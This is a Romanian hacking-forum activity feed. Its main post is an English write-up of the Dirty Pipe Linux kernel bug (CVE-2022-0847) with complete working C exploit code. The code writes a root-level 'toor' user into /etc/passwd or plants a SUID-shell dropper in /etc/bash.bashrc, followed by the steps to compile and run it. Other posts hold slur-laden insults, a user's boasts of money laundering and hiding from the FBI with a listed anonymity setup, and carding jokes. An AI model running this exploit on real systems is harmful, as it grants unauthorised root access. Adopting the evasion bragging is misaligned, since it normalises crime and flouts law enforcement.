All Activity

Eu zic asa...cine n-are minim 64gb de rami in PC, n-are dreptul sa lase comentarii

Hi, yes, Romania, Bulgaria, Serbia, Albania, Greece - Balkan gyros power ❤️

by: Antonius (w1sdom) https://www.bluedragonsec.com https://github.com/bluedragonsecurity Dirty Pipe (CVE-2022–0847) is one of the most significant security vulnerabilities in Linux Kernel 5.8–5.15.24, discovered by Max Kellermann in 2022. This vulnerability allows ordinary users (without special privileges) to overwrite data in files that should be read-only. 6.3.3.1. Understanding Core Concepts Before discussing Dirty Pipe in detail, here are some Linux kernel internal concepts that need to be understood: 1. Paging Paging is a memory management mechanism in the Linux kernel where the memory system divides physical memory into fixed-size small blocks called page frames, and virtual memory is divided into blocks of the same size called pages. This mechanism allows the kernel to map virtual address space of processes to physical memory in a non-sequential manner, which is crucial for efficiency and security in modern systems. 2. Page (Virtual Memory) In Linux, a page is the smallest unit of physical memory management handled by the kernel. Analogy: RAM is like a giant book. A page is one sheet of paper in that book. The kernel doesn’t move data bit by bit, but rather sheet by sheet (page by page). Generally, on modern system architectures (such as x86_64), the standard size of one page is 4 KB (4096 bytes). 3. Page Cache This is a crucial part. Linux doesn’t read files directly from disk every time because it’s slow. The kernel copies file contents into RAM called the Page Cache. When we read a file, the kernel loads it into the Page Cache. If another process wants to read the same file, the kernel only provides a reference to the page that already exists in that memory. Page cache resides in kernel space. 4. Pipe Buffer Pipe is an Inter-Process Communication (IPC) mechanism. Internally, the kernel manages pipes using the pipe_inode_info data structure. Data inside a pipe is stored in a “buffer” called Pipe Buffer. Ring Buffer: The kernel uses a circular (ring) structure to manage this buffer. A ring buffer is a data structure that uses a single array with a fixed size as if its end is connected back to its beginning. This creates a data flow that “rotates” endlessly. Flags: Each buffer has attributes or “flags” that determine its behavior (for example, whether the buffer can be merged). Pipe buffer resides in kernel space. 5. Pipe Buffer Flag (PIPE_BUF_FLAG_CAN_MERGE) The PIPE_BUF_FLAG_CAN_MERGE flag was introduced in Linux Kernel version 5.8. This is where the main vulnerability lies. The flag named PIPE_BUF_FLAG_CAN_MERGE. Its function: Tells the kernel that new data written to the pipe can be merged into an existing buffer. The problem: Before the Dirty Pipe fix, the kernel did not properly clear (reset) this flag when performing splice(). 6. Splice splice() is a syscall for moving data between two file descriptors without copying the data between kernel space and user space. This is often referred to as a Zero-copy mechanism. The splice() syscall is the “main actor” in Dirty Pipe: Instead of physically copying data, splice() performs optimization by making the Pipe Buffer point directly to the page in the Page Cache. This means the pipe doesn’t contain a copy of the file data, but only a “pointer” to the file’s physical memory. 7. Copy on Write (CoW) The Copy-on-Write (CoW) mechanism is a memory management optimization strategy used by the Linux kernel to delay data copying until absolutely necessary. The relationship between Copy-on-Write (CoW) and the Dirty Pipe exploit (CVE-2022–0847) is about how a small bug in the Linux kernel successfully “tricks” the CoW mechanism, allowing data to be written to files that should be read-only. 8. Dirty Page A dirty page is a memory page in RAM that has been modified by an application, but the changes have not yet been written back to secondary storage (such as SSD or hard disk). 6.3.3.2. Analysis of Dirty Pipe Vulnerability Dirty Pipe is a type of logic bug in pipe buffer handling in Linux kernel 5.8 through Linux kernel 5.15.24. The main problem lies in the Pipe mechanism (inter-process communication channel) and how the kernel manages the Page Cache (memory that stores copies of file data from disk). The core issue is a bug in the PIPE_BUF_FLAG_CAN_MERGE flag. The main problem lies in the kernel’s failure to properly re-initialize this flag (logic bug). Here is the code analysis: In the copy_page_to_iter_pipe and push_to_pipe functions in the Linux kernel before version 5.16.11, when performing splice operations, the kernel prepares the pipe_buffer structure but forgets to clean the .flags member. Vulnerable Code Structure: Location of problem: fs/pipe.c or include/linux/pipe_fs_i.h // Location of problem: fs/pipe.c or include/linux/pipe_fs_i.h struct pipe_buffer { struct page *page; unsigned int offset, len; const struct pipe_buf_operations *ops; unsigned int flags; // <--- THIS FLAG IS NOT RESET unsigned long private; }; Code Before Patch (Vulnerable): // lib/iov_iter.c - Before CVE-2022-0847 patch static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes, struct iov_iter *i) { // ---------snip----------- struct pipe_buffer *buf = &pipe->bufs[head & mask]; buf->ops = &page_cache_pipe_buf_ops; buf->page = page; buf->offset = offset; buf->len = bytes; // PROBLEM: buf->flags NOT TOUCHED AT ALL // --------snip---------------------- } Code After Patch (Fixed): buf->ops = &page_cache_pipe_buf_ops; buf->page = page; buf->offset = offset; buf->len = bytes; buf->flags = 0; // <--- TOTAL RESET TO ZERO Why is buf->flags = 0 better than just turning off a specific flag? Because pipe_buffer is a reused structure. If we only turn off one flag (CAN_MERGE), other garbage flags from previous pipe usage (such as PIPE_BUF_FLAG_GIFT or other custom flags) might still remain and cause strange behavior or new security holes in the future. Setting it to 0 ensures the buffer is in a completely “clean” state. Why Can This Be Exploited? Here is the Dirty Pipe exploitation flow: Pollution Stage: The attacker inserts data into the pipe via write(). A regular write() operation will set buf->flags = PIPE_BUF_FLAG_CAN_MERGE. Drain Stage: The attacker reads that data. The buffer is now logically “empty”, but its structure still exists in kernel memory with the CAN_MERGE flag still active. Splice Stage: When the splice() syscall maps a read-only file to a pipe, the copy_page_to_iter_pipe() function is called. Due to the bug above, it fills buf->page with the original file’s memory page but doesn’t reset buf->flags. Execution: The kernel thinks this file buffer can still be merged. The next write to the pipe won’t create a new buffer, but will actually modify directly the memory page (Page Cache) that was mapped earlier. At this stage, the attacker’s data is already stored in RAM. A page in RAM whose contents differ from what’s on disk is called a “Dirty Page”. If this stage is successfully reached, it means the exploitation has succeeded! Once the Page Cache changes, the effect is instant. If we overwrite /etc/passwd in RAM, we can immediately run su root at that very moment. 6.3.3.3. Dirty Pipe Exploitation For Dirty Pipe exploitation, we don’t need to disable any kernel protections because all kernel protections are irrelevant to prevent this logic bug. To exploit the Dirty Page logic bug, our exploit will perform the following steps: Step 1. Prepare the pipe and fill the pipe until full with the goal of triggering the PIPE_BUF_FLAG_CAN_MERGE flag. pipe(p); int capacity = fcntl(p[1], 1032); static char dummy[4096]; for (int r = capacity; r > 0; ) { int n = r > sizeof(dummy) ? sizeof(dummy) : r; write(p[1], dummy, n); r -= n; } Step 2. Empty the pipe. for (int r = capacity; r > 0; ) { int n = r > sizeof(dummy) ? sizeof(dummy) : r; read(p[0], dummy, n); r -= n; } Step 3. Use splice() to insert data from the target file into the pipe. if (splice(fd, &offset, p[1], NULL, 1, 0) < 0) { perror("[-] splice failed"); return 0; } Step 4. Write the payload data to the pipe. write(p[1], payload, strlen(payload)); Complete Exploit Code for Dirty Pipe Exploitation /* Exploit Title: Linux Kernel 5.8 < 5.15.25 - Local Privilege Escalation (DirtyPipe 2) Exploit Author: Antonius (w1sdom) github : https://github.com/bluedragonsecurity web : https://www.bluedragonsec.com tested on : - linux kernel 5.13.0-21-generic (compiled on lubuntu 20.04.5) - linux lubuntu 20.04.2 - linux kernel 5.8 Original Author: Max Kellermann (max.kellermann@ionos.com) CVE: CVE-2022-0847 * Copyright 2022 CM4all GmbH / IONOS SE * * author: Max Kellermann <max.kellermann@ionos.com> * * Proof-of-concept exploit for the Dirty Pipe * vulnerability (CVE-2022-0847) caused by an uninitialized * "pipe_buffer.flags" variable. It demonstrates how to overwrite any * file contents in the page cache, even if the file is not permitted * to be written, immutable or on a read-only mount. * * This exploit requires Linux 5.8 or later; the code path was made * reachable by commit f6dd975583bd ("pipe: merge * anon_pipe_buf*_ops"). The commit did not introduce the bug, it was * there before, it just provided an easy way to exploit it. * * There are two major limitations of this exploit: the offset cannot * be on a page boundary (it needs to write one byte before the offset * to add a reference to this page to the pipe), and the write cannot * cross a page boundary. * * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n' * * Further explanation: https://dirtypipe.cm4all.com/ */ #define _GNU_SOURCE #include <unistd.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/utsname.h> #include <ctype.h> int validate_kernv() { struct utsname buffer; int major, minor, patch; int is_vulnerable = 0; char *version_str; int len, compile_year; if (uname(&buffer) != 0) { perror("uname"); return 1; } version_str = buffer.version; len = strlen(version_str); compile_year = 0; for (int i = len - 4; i >= 0; i--) { if (isdigit(version_str[i]) && isdigit(version_str[i+1]) && isdigit(version_str[i+2]) && isdigit(version_str[i+3])) { compile_year = atoi(&version_str[i]); break; } } if (compile_year < 2023) { is_vulnerable = 1; } int fields = sscanf(buffer.release, "%d.%d.%d", &major, &minor, &patch); if (fields < 3) patch = 0; if (major == 5) { if (minor >= 8 && minor <= 14) { is_vulnerable = 1; } else if (minor == 15 && patch < 25) { is_vulnerable = 1; } } else { printf("[-] kernel is not vulnerable !!! quitting ..."); exit(-1); } if (is_vulnerable) { printf("[*] kernel is vulnerable\n"); } else { printf("[-] kernel is not vulnerable !!! quitting ..."); exit(-1); } return 0; } void prepare_pipe(int p[2]) { pipe(p); int capacity = fcntl(p[1], 1032); static char dummy[4096]; for (int r = capacity; r > 0; ) { int n = r > sizeof(dummy) ? sizeof(dummy) : r; write(p[1], dummy, n); r -= n; } for (int r = capacity; r > 0; ) { int n = r > sizeof(dummy) ? sizeof(dummy) : r; read(p[0], dummy, n); r -= n; } } int inject_payload(char *target, char *payload) { int fd = open(target, O_RDONLY); int p[2]; __off64_t offset = 1; prepare_pipe(p); fd = open(target, O_RDONLY); if (fd < 0) return 1; if (splice(fd, &offset, p[1], NULL, 1, 0) < 0) { perror("[-] splice failed"); return 0; } printf("[*] injecting payload to %s\n", target); write(p[1], payload, strlen(payload)); return 1; } void bashrc() { char *target = "/etc/bash.bashrc"; char *payload = "\ncp /bin/bash /tmp/x; chmod +s /tmp/x\n#"; if (inject_payload(target, payload) == 0) { printf("[-] failed to inject payload !"); } else { printf("[*] payload injected to %s\n", target); printf("[*] you need to wait for root to login\n"); printf("[*] once the root logged in you will get suid shell on /tmp/x\n"); printf("[*] get root by : /tmp/x -p\n"); } } int toor_check() { FILE *fp; char path[1035]; fp = popen("su toor -c id", "r"); if (fp == NULL) { return 0; } if (fgets(path, sizeof(path), fp) != NULL) { if (strstr(path, "root")) { return 1; } } pclose(fp); return 0; } int passwd() { char *target = "/etc/passwd"; char *payload = "\ntoor::0:0:root:/root:/bin/bash\n#"; system("cp /etc/passwd /tmp/passwd.bak"); if (inject_payload(target, payload) == 0) { printf("[-] failed to inject payload !"); } if (toor_check() == 1) { printf("[+] exploitation success, getting root for you.\n"); system("su toor"); } else { printf("[-] failed on method 1, testing method 2\n"); return 0; } return 1; } int main() { validate_kernv(); if (passwd() == 0) { bashrc(); } return 0; } Note: The complete exploit code contains functions for kernel version validation, pipe preparation, payload injection, and two different exploitation methods targeting /etc/passwd and /etc/bash.bashrc. Exploitation Methods The exploit above uses 2 different payloads with the goal that if the first payload fails, it will be chained by the second payload. Payload 1: Writes to /etc/passwd to add a new user named ‘toor’ with uid 0. If this payload succeeds, we can immediately get root shell. Payload 2: Aims to drop a SUID bash shell at /tmp/x. Specifically for the second payload, it must wait for the root user on the system to login because the payload to drop the SUID shell is injected into /etc/bash.bashrc. In Linux, commands contained in /etc/bash.bashrc are executed by every user who logs into the system at login time. # Testing the Exploit In this example, I used Linux kernel 5.13 running on Lubuntu 20.04.5 in VirtualBox as a guest OS and the host OS is Kali Linux 2025.4. On the Lubuntu 20.04.5 machine, compile the exploit: gcc -o dirtypipe2 dirtypipe2.c Run the exploit: ./dirtypipe2 and finally, we got root shell : Press enter or click to view image in full size References Original disclosure: https://dirtypipe.cm4all.com/ CVE-2022–0847: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847 Linux Kernel patch: commit 9d2231c5d74e13b2a0546fee6737ee4446017903 Exploit code: https://github.com/bluedragonsecurity

Hello buddy ! I am from Indonesia, I am a Chinese born in Indonesia. I just notice this forum after doing google search for a linux kernel rootkit that I created in 2014. Here's the topic : I thinks this forum is cool and it will be nice to register here , in my past time, I have some friends from Europe some Albanian hacker friends in my past time such as x-hack, danzel a greece friend : getch is Romania near to Albania and Greece ?

despre tine au facut piesa asta, vad ca iar ai inceput sa scrii gresit, nu-i nicio problema, pana la anul poate mai pui si tu mana pe-o carte, un fraudster de-asta ca tine, cautat global, ar trebui sa aiba destul de mult timp la dispozitie cat sa-si cultive intelectul. din pacate genetic, nu cred ca esti inzestrat, oamenii ca tine, indiferent de cat de tare incearca raman la acelasi nivel, nici banii, nici relatiile nu ii schimba, degeaba scoti sateanul in lume, ca satul din el n-o sa-l poti scoate niciodata . judeci dupa niste gusturi muzicale prost, ascult rominimal, jazz, acid house si ce mai vrea pula mea, daca-mi vand boxele si amplificatorul iti cumpar garsoniera din cosmopolis.

Sa vina direct vizitatorii nepoftiti sa i iau si pe ei in pula. Cereti ajutor ma frate ca la cati sunteti sigur se indura unu de voi .. si oricum nu mai manca la cacat degeaba cu spalarea ta de bani

Cand ma stiu ca am dosare la FBI si ca scrie 40 de ani pe ele... ce sa fac? Am spalat milioane de euro ca sa mi le confiste astia inapoi? M-am zbatut ani de zile sa spal banii cu atatea afaceri paravan degeaba??? Maximizez si eu tot sa nu ma pomenesc cu diicot-ul si europol-ul la 6 dimineata la cafelutza... nu prea imi plac vizitatori nepoftiti... ca aia nu se descalta si imi murdaresc marmura de pe hol... Atat de prost esti ca nu stii ca Whonix foloseste Tor. Netul pe cartel 4g/5g merge mai rapid decat Starlink-ul minune si nu pot sa imi faca americani dns hijacking asa.... iar ai nostri nu stiu dastea. Dupa cum am spus, o parte dintre voi sunteti o cloaca de prosti, infumurati care posteaza manele invechite de 20 de ani. Poate crede-ti ca is vreun pustan din asta. Si la mine in cartier se asculta pe casete cumparate din piata Guta si Copchilu Minune... dar nu toti suntem tigani ca voi... eu am crescut cu bug mafia, puya, 2pac, biggie, nwa etc.. Ce sa fac daca am boala pe tigani borati care posteaza manele invechite pe forumuri ? Gata! Ne vedem la anul. V-am pupat pe portofelele goale de bate vantul. Ne vedem la anul ca sa imi spune-ti ce manele sa mai ascult...

Ba Snowden de Berceni, esti definitia in carne si oase a unui skid paranoic: ai citit jumatate de tutorial de opsec, ai cumparat niste crypto si acum crezi ca esti intangibil. In realitate, esti doar un neckbeard cu net de dial-up din '95 care crede ca e Neo, dar e doar un user frustrat care asteapta 10 minute sa se incarce un JPEG. Eu zic sa-ti pui si TOR + Starlink in tot set-up-ul, esti si mai anonim asa. N-ai vazut 10 mii de euro adunati toata viata ta, esti un sarak, atat mintal cat si sufleteste. Felicitari ca ai inceput sa scrii mai corect, sunt partial mandru de tine. stultitiam simulare propter utilitatem

La urmatoarea internare la psihiatrie vreau sa vad toti criminalii care fac combinatiile cele mai misto sa fac si eu ca na .. sunt sarac si vreau neaparat

Unii is mai nebuni ca altii @Nytro hai sa dam ban la toti care ne strica sustele si ne strica bunastarea pe aici😂😂😂😂😂😂😂😂😂😂😂😂😂😂 @j1ll2013 mai zi si ti ceva inteligent

Fix asta era problema 😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂 si copiii de 12 ani stiu ca exista tails os asa ca calm boss + ca si ei au trecut prin fraude informatice si nu s au ascuns ca sa le faca in continuare indiferent ca stiau tehnica exacta + puteau face sute k euro sa se laude pe la cartieratristi pe vremea cand cu telefoanele mobile + un vpn unii se credeau zei

Sunteti o cloaca de prosti. Ca sa nu muriti prosti: Folosesc Sim 4g platit cash + 10 multi hop proxychain platit cu monero + Whonix + Qubes + Proxy 4g de Romania platit cu monero + Mullvad Browser. Cei drept netul merge cam prost, dar voua va merge creierul prost. Oricum m-ati convins de cat de retardati sunteti. O sa revin la anul pe aci. V-am pupat pe chelie, ca portofelul vostru pute a sarakie.

Uaaa, ar fi top, sa imi pun 200 RON la pensie ❤️

Mulțumesc Am sa reiau procesul Nu am vrut să vă fac să pierdeți așa mult timp Scuzele mele (daca va funcționa am sa fac '"altele") O zi deosebită si încă odată mulțumesc că ați avut timp pentru a ghida

😂😂😂😂😂

N-a facut antidetect update de mult, nu de alta dar hackerasu doar de-ala mai foloseste, cica e safe, nu face fingarprinting. Da-mi ba @rst_sucks adresa de Bitcoin sa-ti dau 100 de euro sa-ti scoti dreq telefonul de la amanet ca nu mai are cine sa ne dea lectii de cardeala, noroc ca mai vine cate-un terminat de-asta ca tine si imi mai aduce zambetul pe buze din cand in cand.

Stai linistit ca tot paznic sunt si eu. Fac de paza pe servere, sa nu intre cineva pe ele. Dau w, w, w .... pana-mi amorteste mana

am fost la lucru toata noaptea ca paznic. de p telefon tastez. nu am bani nici de chirie @aelius de unde weed , pe bonuri de masa ?

In fine, corporatristi sau nu, va iubesc pe toti 😂😂😂 ❤️❤️ Corporatrist tipic:

Toate ca toate, dar rstforums forum de criminalitate informatica? Voi sunteti nebuni baieti

toate ca toate, dar j1 corporatist? 🤣 bros, lasati-o mai moale cu fumatul, ahahaha

Asta e exact formatul corect pentru OpenVPN. Uite ce ai acolo: - <ca> ... </ca> = CA (X.509) - <cert> ... </cert> = certificatul clientului (X.509) - <key> ... </key> = cheia privată a clientului Problema cu x.509 e de fapt o confuzie pentru ca ai tot ce iti trebuie. Cum OPNsense banuiesc ca nu stie sa importe .ovpn (dupa cum vad pe github la requests/features/bugs), poti face manual toata treaba, dupa cum urmeaza: Pasul 1 + Save System -> Trust -> Authorities -> Add Method: Import an existing Certificate Authority Descriptive name: exemplu: vpn-ca Certificate data: Copiezi DOAR blocul tau, din sectiunea <ca> .... </ca>, ce ai intre -----BEGIN CERTIFICATE----- si -----END CERTIFICATE----- Pasul 2 + Save Importa certificatul si cheia clientului astfel: System -> Trust -> Certificates -> Add Method: Import an existing Certificate Descriptive name: exemplu. vpn-client - Certificate data: blocul din <cert> ... </cert> - Private key data: blocul din <key> ... </key> Pasul 3 + Save Configureaza clientul OpenVPN: VPN -> OpenVPN -> Clients -> Add Server host or address: il iei din fisierul .ovpn (linia remote ...) Server port: tot din .ovpn Protocol: UDP/TCP (din .ovpn, ex. proto udp) Device mode: tun (banuiesc ca ai asta acolo) TLS Authentication: - daca in .ovpn exista <tls-auth> sau tls-crypt, trebuie importat - dacă nu exista, lasi off Peer Certificate Authority: alegi vpn-ca Client Certificate: alegi vpn-client Encryption / auth: sa corespunda cu ce e in .ovpn (cipher, auth, data-ciphers etc.) Pasul 4 - in functie de ce vrei 4) Rutare / gateway (daca vrei sa trimiti traficul prin VPN) Dupa ce clientul se conecteaza: - Interfaces -> Assignments: adaugi interfata ovpnXX si o activezi System -> Routing -> Gateways: apare un gateway pe acel interface Firewall rules: faci policy routing (rule pe LAN cu "Gateway = VPN_GW"), sau gateway group daca ai mai multe VPN-uri. Observatie: Am inlaturat/redactat postarea ta pentru a scoate key-urile (pe care iti recomand sa nu le mai postezi la liber pe internet) - adica private key pe public.

Ms

Server VPN și fișierele sunt xxx.ovpn Atașez unul -----BEGIN CERTIFICATE----- [redacted] -----END CERTIFICATE----- </ca> <cert> -----BEGIN CERTIFICATE----- [redacted] -----END CERTIFICATE----- </cert> <key> -----BEGIN PRIVATE KEY----- [redacted] -----END PRIVATE KEY----- </key>

Cum fac sa devin corporatrist. Readuc forumul la viata. Am experienta